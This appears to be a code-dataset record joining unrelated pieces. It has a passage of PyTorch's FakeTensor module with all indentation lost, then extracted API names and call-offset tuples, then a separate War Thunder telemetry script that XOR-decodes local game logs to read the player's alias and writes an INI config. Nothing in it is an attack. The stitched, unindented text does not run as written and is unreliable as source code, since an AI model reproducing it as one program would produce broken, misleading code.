out = self.tensor_memo[t]
out._fix_weakref()
return out
return None
def from_real_tensor(self, fake_mode, t):
maybe_memo = self._get_memo(t)
if maybe_memo is not None:
return maybe_memo
existing_device = t.device
# not yet supported in metatensors
if t.is_complex():
raise UnsupportedFakeTensorException("complex nyi in meta tensors")
if t.is_sparse:
raise UnsupportedFakeTensorException("sparse nyi in meta tensors")
if t.is_quantized:
raise UnsupportedFakeTensorException("quantized nyi in meta tensors")
with no_dispatch():
out = FakeTensor(fake_mode, self.meta_converter(t), existing_device)
if type(t) is torch.nn.Parameter:
out = torch.nn.Parameter(out, requires_grad=out.requires_grad) # type: ignore[assignment]
self.tensor_memo[t] = out
return out
def from_meta_and_device(self, fake_mode, t, device):
maybe_memo = self._get_memo(t)
if maybe_memo is not None:
return maybe_memo
out = FakeTensor(fake_mode, t, device)
self.tensor_memo[t] = out
return out
def __call__(self, fake_mode, t, device=None):
assert t.device.type != "meta" or device is not None
if t.device.type != "meta":
return self.from_real_tensor(fake_mode, t)
else:
return self.from_meta_and_device(fake_mode, t, device)
op_implementations = []
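# Registry of (predicate, impl) pairs; FakeTensorMode consults these before
# running an op, so special cases (constructors, .to, clone, ...) can be
# intercepted.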
def register_op_impl(run_impl_check: Union[Callable[[OpOverload], bool], OpOverload]):
def impl_decorator(op_impl):
global op_implementations
if isinstance(run_impl_check, OpOverload):
op_implementations.append((lambda func: func == run_impl_check, op_impl))
else:
op_implementations.append((run_impl_check, op_impl))
return op_impl
return impl_decorator
@register_op_impl(lambda func: (_is_tensor_constructor(func) or func in _like_tensor_constructors))
def constructors(fake_mode, func, *args, **kwargs):
assert func not in _non_kwarg_device_constructors
_, new_kwargs = normalize_function(
func, args=args, kwargs=kwargs, normalize_to_only_use_kwargs=True
)
if func in _like_tensor_constructors:
default_device = new_kwargs["input"].device
# TODO: file issue
args = (new_kwargs.pop("input"),)
else:
# cpu is default device if none is specified
default_device = torch.device("cpu")
args = ()
out_device = new_kwargs.pop("device", None)
out_device = out_device if out_device is not None else default_device
new_kwargs["device"] = torch.device("meta")
r = func(*args, **new_kwargs)
return FakeTensor(fake_mode, r, out_device)
@register_op_impl(lambda func: func in (aten.to.prim_Device, aten.to.device))
def non_kwarg_to(fake_mode, func, *args, **kwargs):
_, new_kwargs = normalize_function(
func, args, kwargs, normalize_to_only_use_kwargs=True
)
input_device = new_kwargs["device"]
out_device = input_device if input_device else new_kwargs["input"].device
new_kwargs["device"] = torch.device("meta")
r = func(*args, **new_kwargs)
return fake_mode.fake_tensor_converter(fake_mode, r, out_device)
# Dont default to default device handling,
# since the device of `the_template` is ignored
@register_op_impl(aten.resize_as_.default)
def resize_as_(fake_mode, func, *args, **kwargs):
return func(*args, **kwargs)
# _to_copy fails when run with FakeTensors to cuda device
# TODO: debug
@register_op_impl(torch.ops.aten._to_copy.default)
def to_copy(fake_mode, func, *args, **kwargs):
_, new_kwargs = normalize_function(
func, args=args, kwargs=kwargs, normalize_to_only_use_kwargs=True
)
input_device = new_kwargs.pop("device", None)
out_device = input_device if input_device else new_kwargs["input"].device
with no_dispatch():
input = new_kwargs.pop("input").to("meta")
return FakeTensor(
fake_mode, torch.ops.aten._to_copy(input, **new_kwargs), out_device
)
@register_op_impl(torch.ops.aten.clone.default)
def clone(fake_mode, func, input, memory_format=None):
out_device = input.device
with no_dispatch():
out = torch.ops.aten._to_copy(input.to("meta"), memory_format=memory_format)
return FakeTensor(fake_mode, out, out_device)
# index.Tensor data-dependent in only some conditions
@register_op_impl(lambda func: torch.Tag.dynamic_output_shape in func.tags # type: ignore[attr-defined]
and func != aten.index.Tensor)
def data_dep_op(fake_mode, func, *args, **kwargs):
raise DynamicOutputShapeException(func)
# Bool Indices get Expanded as Masks
# See: IndexingUtils.h:expandTensors
def check_no_bool_index_tensors(func, self, indices):
for index in indices:
if index is not None and index.dtype in (torch.bool, torch.uint8):
raise DynamicOutputShapeException(func)
# Meta tensors give you the ability to run PyTorch code without having to
# actually do computation through tensors allocated on a `meta` device.
# Because the device is `meta`, meta tensors do not model device propagation.
# FakeTensor extends MetaTensors to also carry an additional `fake_device`
# which tracks devices that would have been used.
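# A rough usage sketch (the call pattern below is pieced together from this
# file and is an assumption, not an official API):
#
#   mode = FakeTensorMode()
#   fake = mode.from_tensor(torch.empty(2, 2, device="cpu"))
#   fake.device  # -> device('cpu'): the tracked fake_device, not 'meta'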
class FakeTensor(torch.Tensor):
fake_device: torch.device
fake_mode: "FakeTensorMode"
@staticmethod
def __new__(cls, fake_mode, elem, device):
return torch.Tensor._make_subclass(
cls, elem, elem.requires_grad, dispatch_device=True
)
def __init__(self, fake_mode, elem, device: Union[torch.device, str]):
# elem does not need to be recorded, because FakeTensor *is a* elem
assert elem.device.type == "meta"
device = device if isinstance(device, torch.device) else torch.device(device)
assert device.type != "meta"
self.fake_device = device
self.fake_mode = fake_mode
@staticmethod
def from_tensor(t, fake_mode):
existing_device = t.device
return FakeTensor(fake_mode, t.to(device="meta"), existing_device)
# TODO: resolve error in default __repr__
def __repr__(self):
return f"FakeTensor({self.fake_device}, {self.size()}, {self.dtype})"
def new(self, *args, **kwargs):
# torch.Tensor.new does not go through the normal dispatcher pattern
# so in order to use the same pattern as normal invocation of
# returning meta device within the kernel we need to intercept
# the call here
out_device = self.fake_device
if "device" in kwargs:
kwarg_device = kwargs.pop("device")
out_device = kwarg_device if kwarg_device else out_device
kwargs["device"] = "meta"
self.in_kernel_invocation = True
try:
with no_dispatch():
meta_out = super().new(*args, **kwargs)
finally:
self.in_kernel_invocation = False
with no_dispatch():
return FakeTensor(self.fake_mode, meta_out, out_device)
@classmethod
def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
# need to handle here to avoid infinite recursion
# see [in_kernel_invocation]
if func == torch.ops.prim.device.default:
assert len(args) == 1 and isinstance(args[0], FakeTensor)
if args[0].fake_mode.in_kernel_invocation:
return torch.device("meta")
else:
return args[0].fake_device
fake_mode = None
for arg in itertools.chain(tree_flatten(args)[0], tree_flatten(kwargs)[0]):
if isinstance(arg, FakeTensor):
if fake_mode is None:
fake_mode = arg.fake_mode
else:
assert fake_mode is arg.fake_mode, "Mixing modes NYI"
with enable_torch_dispatch_mode(fake_mode):
return func(*args, **kwargs)
@staticmethod
def _find_common_device(func, args, kwargs):
# cpu - zero-dim tensors can be called in cuda kernels,
        # so overwrite the common_device if the only existing
        # device comes from a cpu zero-dim tensor
common_device = None
is_cpu_zero_dim = None
def cpu_zero_dim(t):
return t.device.type == "cpu" and t.dim() == 0
def merge_devices(t):
nonlocal common_device
nonlocal is_cpu_zero_dim
if not isinstance(t, FakeTensor):
return
if common_device is None:
common_device = t.device
is_cpu_zero_dim = cpu_zero_dim(t)
return
t_is_cpu_zero_dim = cpu_zero_dim(t)
if t.device == common_device:
if is_cpu_zero_dim:
is_cpu_zero_dim = t_is_cpu_zero_dim
return
# mismatching devices !
# if current tensor is cpu 0 dim, defer to existing device
if t_is_cpu_zero_dim:
return
# current device is from cpu 0 dim tensor, overwrite
if is_cpu_zero_dim:
common_device = t.device
is_cpu_zero_dim = t_is_cpu_zero_dim
return
# mismatching devices of non-zero dim tensors, throw
# This might be valid behavior and need to be explicitly modeled, e.g. reshape_as
raise Exception(
f"Unhandled FakeTensor Device Propagation for {func}, found two different devices {common_device}, {t.device}"
)
tree_map(merge_devices, args)
tree_map(merge_devices, kwargs)
assert common_device is not None, f"Could not find common device for {func}"
return common_device
__torch_function__ = torch._C._disabled_torch_function_impl
# We keep one instantiation of `fake_tensor_converter` active
# for the duration of `with torch_enable_mode(FakeTensorMode)`.
# This allows accurate storage aliasing across invocation of
# different operators. While this will keep all freshly allocated
# tensors alive during `FakeTensorMode`, there will be no
# new allocations of Tensors which have non-meta storage so
# memory should not significantly increase.
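# Sketch of entering the mode via the helper imported above (assumed usage):
#
#   with enable_torch_dispatch_mode(FakeTensorMode(allow_cpu_fallback=False)):
#       y = fake_x + fake_x  # routed through __torch_dispatch__ below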
class FakeTensorMode(TorchDispatchMode):
def __init__(self, allow_cpu_fallback=True):
self.allow_cpu_fallback = allow_cpu_fallback
self.fake_tensor_converter = FakeTensorConverter()
# [in_kernel_invocation]
# when FakeTensor is invoked in user code, .device should return
        # the fake_device of the tensor so that code such as `if x.is_cuda`
# or torch.zeros([10, 10], device=x.device) continues to execute as if
# the FakeTensor were real. However, within kernel execution, we return
# the `Meta` device because all computation within the kernels should
# behave as if the Tensors are on meta devices. Kernels should allocate
# new tensors on meta devices, and checks like `is_meta` should return true.
# within python refs, we always return the real device by defining
# the device property
self.in_kernel_invocation = False
def __torch_dispatch__(self, func, types, args=(), kwargs=None):
kwargs = kwargs if kwargs else {}
if func == torch.ops.prim.device.default:
assert len(args) == 1 and isinstance(args[0], FakeTensor)
if args[0].fake_mode.in_kernel_invocation:
return torch.device("meta")
else:
return args[0].fake_device
# prims already wrap FakeTensor inputs to FakeTensor outputs
        # and do device logic, we don't need to do anything but run them
if "prims::" in func._schema.name:
with no_dispatch():
return func(*args, **kwargs)
with no_dispatch():
# TODO: apply as no_dispatch decorator
converter = self.fake_tensor_converter
# this is generated from torch.tensor(), which does not use the
# dispatcher, to allow wrapper subclasses to wrap the new tensor
# we need to handle before error checking
if func == torch.ops.aten.lift.default:
assert (
len(kwargs) == 0
and len(args) == 1
and type(args[0]) is torch.Tensor
)
with no_dispatch():
return converter(self, args[0])
def wrap(e, device=None):
if isinstance(e, torch.Tensor) and not isinstance(e, FakeTensor):
return converter(self, e, device)
else:
return e
# if we are in the dispatch mode, we will enter this function even if the inputs
# are not FakeTensors. For now, throw if any non-Fake Tensor inputs
# and just support constructors. TODO: extend more broadly
conversion_made = False
def check_non_fake_tensor(x):
nonlocal conversion_made
conversion_made = conversion_made or (
isinstance(x, torch.Tensor) and not isinstance(x, FakeTensor)
)
tree_map(check_non_fake_tensor, args)
tree_map(check_non_fake_tensor, kwargs)
if conversion_made:
raise Exception(
"Invoking operators with non-Fake Tensor inputs in FakeTensorMode is not yet supported. "
f"Please convert all Tensors to FakeTensors first. Found in {func}"
)
for run_impl_check, op_impl in op_implementations:
if run_impl_check(func):
return op_impl(self, func, *args, **kwargs)
if func == aten.index.Tensor:
check_no_bool_index_tensors(func, *args, **kwargs)
self.in_kernel_invocation = True
try:
r = func(*args, **kwargs)
except NotImplementedError as not_implemented_error:
if not self.allow_cpu_fallback:
raise not_implemented_error
r = run_cpu_fallback(func, args, kwargs, not_implemented_error)
finally:
self.in_kernel_invocation = False
# TODO: handle non-kwarg devices
assert func not in _device_not_kwarg_ops, f"NYI: {func}"
# if device is specified, use that
if kwargs.get("device", None):
return tree_map(partial(wrap, device=kwargs["device"]), r)
common_device = FakeTensor._find_common_device(func, args, kwargs)
return tree_map(partial(wrap, device=common_device), r)
def from_tensor(self, tensor):
return self.fake_tensor_converter(self, tensor)
def run_cpu_fallback(func, args, kwargs, orig_not_implemented_exception):
with no_dispatch():
def to_cpu(e):
if isinstance(e, FakeTensor):
return torch.zeros_like(e, device="cpu")
return e
try:
args = tree_map(to_cpu, args)
kwargs = tree_map(to_cpu, kwargs)
r = func(*args, **kwargs)
except Exception as new_exception:
raise orig_not_implemented_exception from new_exception
tensor_impls = set()
storages = set()
for e in tree_flatten((args, kwargs))[0]:
if isinstance(e, torch.Tensor):
tensor_impls.add(e)
storages.add(e.storage()._cdata)
# TODO: also check metadata change on inputs
# proper aliasing/metadata relationship between outputs and inputs will
# not be set up, bc of conversion to cpu, error on reused impls
for e in tree_flatten(r)[0]:
if e in tensor_impls or (
isinstance(e, torch.Tensor) and e.storage()._cdata in storages
):
raise orig_not_implemented_exception
# we're only converting these to MetaTensors now, not Fake Tensors,
# and the cpu inputs should be temporary. just convert outputs to meta
# and continue
return tree_map(MetaConverter(), r)
# Just for use to allow copying a module to fake tensors,
# does not apply elsewhere
class FakeCopyMode(TorchFunctionMode):
def __init__(self, fake_mode):
self.fake_mode = fake_mode
def __torch_function__(self, func, types, args=(), kwargs=None):
kwargs = kwargs if kwargs else {}
# clone will get called in Parameter deepcopy
if func == torch._C._TensorBase.clone:
return func(self.fake_mode.from_tensor(args[0]), **kwargs)
elif func == torch.Tensor.__deepcopy__:
assert len(args) == 2 and len(kwargs) == 0
tensor, memo = args
if id(tensor) in memo:
return memo[id(tensor)]
out = self.fake_mode.from_tensor(tensor)
memo[id(tensor)] = out
return out
else:
with torch._C.DisableTorchFunction():
return func(*args, **kwargs)
|
[
"torch.nn.Parameter",
"functools.partial",
"torch.zeros_like",
"torch._subclasses.meta_utils.MetaConverter",
"torch.utils._python_dispatch.enable_torch_dispatch_mode",
"torch.ops.aten._to_copy",
"torch.utils._pytree.tree_flatten",
"torch.Tensor._make_subclass",
"torch.utils._mode_utils.no_dispatch",
"torch._C.DisableTorchFunction",
"torch.device",
"functools.lru_cache",
"torch.utils._pytree.tree_map",
"torch.fx.operator_schemas.normalize_function",
"torch._C.TensorType.get",
"weakref.WeakValueDictionary"
] |
[((1770, 1795), 'functools.lru_cache', 'functools.lru_cache', (['None'], {}), '(None)\n', (1789, 1795), False, 'import functools\n'), ((1178, 1203), 'torch._C.TensorType.get', 'torch._C.TensorType.get', ([], {}), '()\n', (1201, 1203), False, 'import torch\n'), ((5101, 5190), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func'], {'args': 'args', 'kwargs': 'kwargs', 'normalize_to_only_use_kwargs': '(True)'}), '(func, args=args, kwargs=kwargs,\n    normalize_to_only_use_kwargs=True)\n', (5119, 5190), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((5639, 5659), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (5651, 5659), False, 'import torch\n'), ((5893, 5966), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func', 'args', 'kwargs'], {'normalize_to_only_use_kwargs': '(True)'}), '(func, args, kwargs, normalize_to_only_use_kwargs=True)\n', (5911, 5966), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((6126, 6146), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (6138, 6146), False, 'import torch\n'), ((6661, 6750), 'torch.fx.operator_schemas.normalize_function', 'normalize_function', (['func'], {'args': 'args', 'kwargs': 'kwargs', 'normalize_to_only_use_kwargs': '(True)'}), '(func, args=args, kwargs=kwargs,\n    normalize_to_only_use_kwargs=True)\n', (6679, 6750), False, 'from torch.fx.operator_schemas import normalize_function\n'), ((2772, 2801), 'weakref.WeakValueDictionary', 'weakref.WeakValueDictionary', ([], {}), '()\n', (2799, 2801), False, 'import weakref\n'), ((2832, 2847), 'torch._subclasses.meta_utils.MetaConverter', 'MetaConverter', ([], {}), '()\n', (2845, 2847), False, 'from torch._subclasses.meta_utils import MetaConverter\n'), ((5452, 5471), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (5464, 5471), False, 'import torch\n'), ((6899, 6912), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (6910, 6912), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((7225, 7238), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (7236, 7238), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((8492, 8577), 'torch.Tensor._make_subclass', 'torch.Tensor._make_subclass', (['cls', 'elem', 'elem.requires_grad'], {'dispatch_device': '(True)'}), '(cls, elem, elem.requires_grad, dispatch_device=True\n    )\n', (8519, 8577), False, 'import torch\n'), ((12634, 12663), 'torch.utils._pytree.tree_map', 'tree_map', (['merge_devices', 'args'], {}), '(merge_devices, args)\n', (12642, 12663), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((12672, 12703), 'torch.utils._pytree.tree_map', 'tree_map', (['merge_devices', 'kwargs'], {}), '(merge_devices, kwargs)\n', (12680, 12703), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((17981, 17994), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (17992, 17994), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((19241, 19256), 'torch._subclasses.meta_utils.MetaConverter', 'MetaConverter', ([], {}), '()\n', (19254, 19256), False, 'from torch._subclasses.meta_utils import MetaConverter\n'), ((2134, 2159), 'torch._C.TensorType.get', 'torch._C.TensorType.get', ([], {}), '()\n', (2157, 2159), False, 'import torch\n'), ((3584, 3597), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (3595, 3597), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((3740, 3796), 'torch.nn.Parameter', 'torch.nn.Parameter', (['out'], {'requires_grad': 'out.requires_grad'}), '(out, requires_grad=out.requires_grad)\n', (3758, 3796), False, 'import torch\n'), ((7015, 7059), 'torch.ops.aten._to_copy', 'torch.ops.aten._to_copy', (['input'], {}), '(input, **new_kwargs)\n', (7038, 7059), False, 'import torch\n'), ((8854, 8874), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (8866, 8874), False, 'import torch\n'), ((10017, 10030), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (10028, 10030), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((10909, 10946), 'torch.utils._python_dispatch.enable_torch_dispatch_mode', 'enable_torch_dispatch_mode', (['fake_mode'], {}), '(fake_mode)\n', (10935, 10946), False, 'from torch.utils._python_dispatch import TorchDispatchMode, enable_torch_dispatch_mode\n'), ((14910, 14923), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (14921, 14923), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((16307, 16344), 'torch.utils._pytree.tree_map', 'tree_map', (['check_non_fake_tensor', 'args'], {}), '(check_non_fake_tensor, args)\n', (16315, 16344), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((16357, 16396), 'torch.utils._pytree.tree_map', 'tree_map', (['check_non_fake_tensor', 'kwargs'], {}), '(check_non_fake_tensor, kwargs)\n', (16365, 16396), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18172, 18194), 'torch.utils._pytree.tree_map', 'tree_map', (['to_cpu', 'args'], {}), '(to_cpu, args)\n', (18180, 18194), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18216, 18240), 'torch.utils._pytree.tree_map', 'tree_map', (['to_cpu', 'kwargs'], {}), '(to_cpu, kwargs)\n', (18224, 18240), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18464, 18492), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['(args, kwargs)'], {}), '((args, kwargs))\n', (18476, 18492), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((18849, 18864), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['r'], {}), '(r)\n', (18861, 18864), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((9869, 9882), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (9880, 9882), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((10479, 10499), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (10491, 10499), False, 'import torch\n'), ((10622, 10640), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['args'], {}), '(args)\n', (10634, 10640), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((10645, 10665), 'torch.utils._pytree.tree_flatten', 'tree_flatten', (['kwargs'], {}), '(kwargs)\n', (10657, 10665), False, 'from torch.utils._pytree import tree_map, tree_flatten\n'), ((14555, 14575), 'torch.device', 'torch.device', (['"""meta"""'], {}), "('meta')\n", (14567, 14575), False, 'import torch\n'), ((14836, 14849), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (14847, 14849), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((17765, 17800), 'functools.partial', 'partial', (['wrap'], {'device': 'common_device'}), '(wrap, device=common_device)\n', (17772, 17800), False, 'from functools import partial\n'), ((18084, 18117), 'torch.zeros_like', 'torch.zeros_like', (['e'], {'device': '"""cpu"""'}), "(e, device='cpu')\n", (18100, 18117), False, 'import torch\n'), ((15481, 15494), 'torch.utils._mode_utils.no_dispatch', 'no_dispatch', ([], {}), '()\n', (15492, 15494), False, 'from torch.utils._mode_utils import no_dispatch\n'), ((17613, 17651), 'functools.partial', 'partial', (['wrap'], {'device': "kwargs['device']"}), "(wrap, device=kwargs['device'])\n", (17620, 17651), False, 'from functools import partial\n'), ((20096, 20127), 'torch._C.DisableTorchFunction', 'torch._C.DisableTorchFunction', ([], {}), '()\n', (20125, 20127), False, 'import torch\n')]
|
import configparser
import getpass
import glob
import os
import pathlib
import platform
import re
import socket
import sys
import threading
import time
import loguru
import psutil
import requests
from cursor import cursor
class CFG:
def __init__(self):
self.i18n = None
self.cfg_gen = None
self.cfg_net = None
self.cfg_log = None
self.cfg_dbg = None
self.cfg_ftp = None
self.cfg_pyu = None
self.cfg_dir = None
self.cfg_cfg = None
self.clog_files = None
self.game_version = None
self.user_units_file = None
self.game_settings_file = None
self.user_settings_file = None
self.game_settings_root = None
self.user_settings_root = None
self.tacv_textures_root = None
self.acmi_localdir_root = None
self.players_sys = platform.system()
self.players_uid = getpass.getuser()
self.players_cid = socket.gethostname()
self.players_arc = platform.architecture()
self.cp = configparser.ConfigParser()
self.game_settings_root = self.get_war_paths()
if self.players_sys == "Darwin":
wargame_cfg = 'My Games/WarThunder'
elif self.players_sys == "Linux":
wargame_cfg = '.config/WarThunder'
elif self.players_sys == "Windows":
wargame_cfg = 'Documents/My Games/WarThunder'
else:
wargame_cfg = None
self.config_file_name = "thundertac.ini"
self.user_settings_root = pathlib.Path.home().joinpath(wargame_cfg)
if not self.user_settings_root.is_dir():
self.user_settings_root.mkdir(mode=0o777, parents=True, exist_ok=False)
self.user_settings_file = self.user_settings_root.joinpath(self.config_file_name)
if self.game_settings_root is not None:
self.i18n = self.aces_language().replace('"', '')
self.game_version = self.get_game_version()
# TODO: this isn't finished
if self.players_sys == 'Linux':
                loguru.logger.warning("*nix users must manually enter the path to their WINE installed Tacview root + "
"/Data/Terrain/Textures/ \nEX:'/home/divine/Programs/Tacview (beta)"
"/Data/Terrain/Textures/'")
elif self.players_sys == 'Windows':
# TODO: switch to pathlib if possible
self.tacv_textures_root = os.path.join(os.environ['APPDATA'], "Tacview\\Data\\Terrain\\Textures")
self.acmi_localdir_root = pathlib.Path.home().joinpath('Documents/ACMI')
if not self.acmi_localdir_root.is_dir():
self.acmi_localdir_root.mkdir(mode=0o777, parents=True, exist_ok=False)
# create thundertac.ini if not exist
if not self.user_settings_file.exists():
self.create_cfg()
self.read_cfg()
def remove_cfg(self):
pathlib.Path(self.user_settings_file).unlink(missing_ok=True)
self.create_cfg()
def create_cfg(self):
d = {
# TODO: CHECK PATH TO LINUX GAME LOGS FOLDER
'Linux': self.user_settings_root.joinpath('.game_logs/'),
'Windows': pathlib.Path(self.game_settings_root).joinpath('.game_logs/')
}
path_war_clogdir = d[platform.system()]
self.clog_files = glob.glob(f"{str(path_war_clogdir)}/*.clog")
while True:
user_alias_data = self.get_user_alias()
try:
user_alias = user_alias_data[0]
user_gid = user_alias_data[1]
except TypeError:
self.clog_files.pop()
else:
break
self.cp['network'] = {}
self.cp['general'] = {}
self.cp['loguru'] = {}
self.cp['debug'] = {}
self.cp['ftpcred'] = {}
self.cp['pyupdater'] = {}
self.cp['path'] = {}
self.cp['configinit'] = {}
self.cp['network']['net_host'] = "127.0.0.1" # self.players_cid
self.cp['network']['net_port'] = "8111"
self.cp['general']['ttac_usr'] = user_alias
self.cp['general']['ttac_mas'] = user_alias
self.cp['general']['ttac_rec'] = "ttac.rec"
self.cp['general']['ttac_int'] = "0.02"
self.cp['general']['user_gid'] = user_gid
self.cp['general']['war_lang'] = self.i18n[:-1]
self.cp['loguru']['logger_l'] = "DEBUG"
self.cp['debug']['debug_on'] = "True"
self.cp['ftpcred']['ftp_send'] = "False"
self.cp['ftpcred']['ftp_addr'] = "ftp.thundertac.altervista.org"
self.cp['ftpcred']['ftp_user'] = "thundertac"
self.cp['ftpcred']['ftp_pass'] = "<PASSWORD>"
self.cp['ftpcred']['ftp_sess'] = "WIP"
self.cp['pyupdater']['pyu_uchn'] = "stable"
self.cp['pyupdater']['pyu_schn'] = "True"
self.cp['path']['war_root'] = self.game_settings_root.__str__()
self.cp['path']['cfg_root'] = self.user_settings_root.__str__()
self.cp['path']['tex_root'] = self.tacv_textures_root.__str__()
self.cp['path']['rec_root'] = self.acmi_localdir_root.__str__()
self.cp['configinit']['init_run'] = "True"
with open(self.user_settings_file, 'w') as f:
self.cp.write(f)
def read_cfg(self):
self.cp.read(self.user_settings_file)
# self.game_install_path = self.cp['path']['war_path']
# for section_title, section_values in (dict(self.cp.items())).items():
# print(dict(section_values))
self.cfg_net = dict(self.cp.items('network'))
self.cfg_gen = dict(self.cp.items('general'))
self.cfg_log = dict(self.cp.items('loguru'))
self.cfg_dbg = dict(self.cp.items('debug'))
self.cfg_ftp = dict(self.cp.items('ftpcred'))
self.cfg_pyu = dict(self.cp.items('pyupdater'))
self.cfg_dir = dict(self.cp.items('path'))
self.cfg_cfg = dict(self.cp.items('configinit'))
def get_war_paths(self):
try:
            self.game_settings_root = pathlib.Path(self.cfg_dir['war_root'])  # key written by create_cfg()
self.game_settings_file = self.game_settings_root.joinpath('config.blk')
if self.game_settings_file.is_file():
return
        except (TypeError, KeyError):
cursor.hide()
while self.game_settings_root is None:
try:
platform_lookup = {"Darwin": "aces", "Linux": "aces", "Windows": "aces.exe"}
target = platform_lookup[self.players_sys]
pid_list = [pid.pid for pid in psutil.process_iter() if pid.name() == target]
if 0 < len(pid_list):
proc = pathlib.Path((psutil.Process(pid_list[0])).exe())
self.game_settings_root = proc.parent.parent
return self.game_settings_root
else:
with Spinner():
time.sleep(.90)
except KeyboardInterrupt:
cursor.show()
sys.exit()
def get_game_version(self):
if self.game_settings_root:
version_file = self.game_settings_root.joinpath('content/pkg_main.ver')
with open(version_file, "r") as frv:
self.game_version = frv.read()
return self.game_version
def get_user_alias(self):
def un_xor(data):
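            # The .clog files are obfuscated with a fixed repeating XOR key;
            # XOR-ing each byte with the key again recovers the plaintext.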
xor_key = bytearray(b"\<KEY>"
b"\<KEY>"
b"\x4E\xE1\x5A\xF9\xF1\x01\x4B\xB1\xAD\xB6\x4C\x4C\xFA\x74\x28\x69"
b"\xC2\x8B\x11\x17\xD5\xB6\x47\xCE\xB3\xB7\xCD\x55\xFE\xF9\xC1\x24"
b"\xFF\xAE\x90\x2E\x49\x6C\x4E\x09\x92\x81\x4E\x67\xBC\x6B\x9C\xDE"
b"\xB1\x0F\x68\xBA\x8B\x80\x44\x05\x87\x5E\xF3\x4E\xFE\x09\x97\x32"
b"\<KEY>"
b"\x53\x00\x3C\xA6\xB8\x22\x41\x32\xB1\xBD\xF5\x28\x50\xE0\x72\xAE")
d_data = bytearray(len(data))
key_length = len(xor_key)
for i, c in enumerate(data):
d_data[i] = c ^ xor_key[(i % key_length)]
# sys.stdout.write(chr(d_data[i]))
# print(chr(c))
# time.sleep(0.001)
return d_data
last_clog_fileis = max(self.clog_files, key=os.path.getctime)
with open(last_clog_fileis, 'rb') as f:
xor_ed = f.read()
xor_ed_byte_array = bytearray(xor_ed)
un_xor_ed = un_xor(xor_ed_byte_array)
decode_type = None
decoded = None
if self.players_sys == "Darwin":
pass
elif self.players_sys == "Linux":
import cchardet as chardet
result = chardet.detect(bytes(un_xor_ed))
decode_type = result['encoding']
elif self.players_sys == "Windows":
            decode_type = 'mbcs'  # Python's codec for the Windows ANSI code page
try:
decoded = bytes(un_xor_ed).decode(decode_type)
except UnicodeDecodeError as get_user_alias_unicode_decode_error:
import cchardet as chardet
result = chardet.detect(bytes(un_xor_ed))
decode_type = result['encoding']
decoded = bytes(un_xor_ed).decode(decode_type)
finally:
# with open('unxored', 'w', encoding='utf-8') as f:
# f.write(decoded)
xxx = re.search(r"(\w+)\[(\d+)] successfully passed yuplay authorization", decoded, re.M)
if xxx:
print(xxx.groups())
user_alias, user_gj_id = xxx.group(1), xxx.group(2)
return user_alias, user_gj_id
# except LookupError as err_lookup_err_cfg_xor_decryption:
# loguru.logger.exception(err_lookup_err_cfg_xor_decryption)
# sys.exit()
def aces_language(self):
path_config_blk = self.game_settings_root.joinpath('config.blk')
with open(path_config_blk) as f:
lines = f.readlines()
for line in lines:
if line.startswith('language'):
return line.split(':t=')[1]
class API(CFG):
    # TODO: INHERIT FROM CFG INSTEAD OF CREATING INSTANCE OF CFG
def __init__(self, port=8111):
super().__init__()
base_address = f"http://{self.players_cid}:{port}"
self.LMAP = f"{base_address}/map.img"
self.INFO = f"{base_address}/map_info.json"
self.STAT = f"{base_address}/state"
self.INDI = f"{base_address}/indicators"
self.OBJT = f"{base_address}/map_obj.json"
self.CHAT = f"{base_address}/gamechat"
self.HMSG = f"{base_address}/hudmsg"
def gamechat(self, lastId=0):
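        # Poll the local War Thunder web API and keep only the newest entry.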
data = requests.get(f'{self.CHAT}?lastId={lastId}').json()[-1]
print(data)
class Spinner:
busy = False
delay = 0.01
@staticmethod
def spinning_cursor():
s = "WAITING "
while True:
spinner_list = []
for s_index, s_value in enumerate(s):
s_prefix = 11
s_suffix = 0 + s_index
for j, jj in enumerate(s):
if (s_index + j) <= len(s):
spinner_list.append(s[0:s_index] + " "*(s_prefix-s_index) + s_value + " "*s_suffix)
s_prefix -= 1
s_suffix += 1
for cursor_iteration in spinner_list:
yield cursor_iteration
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\r')
sys.stdout.flush()
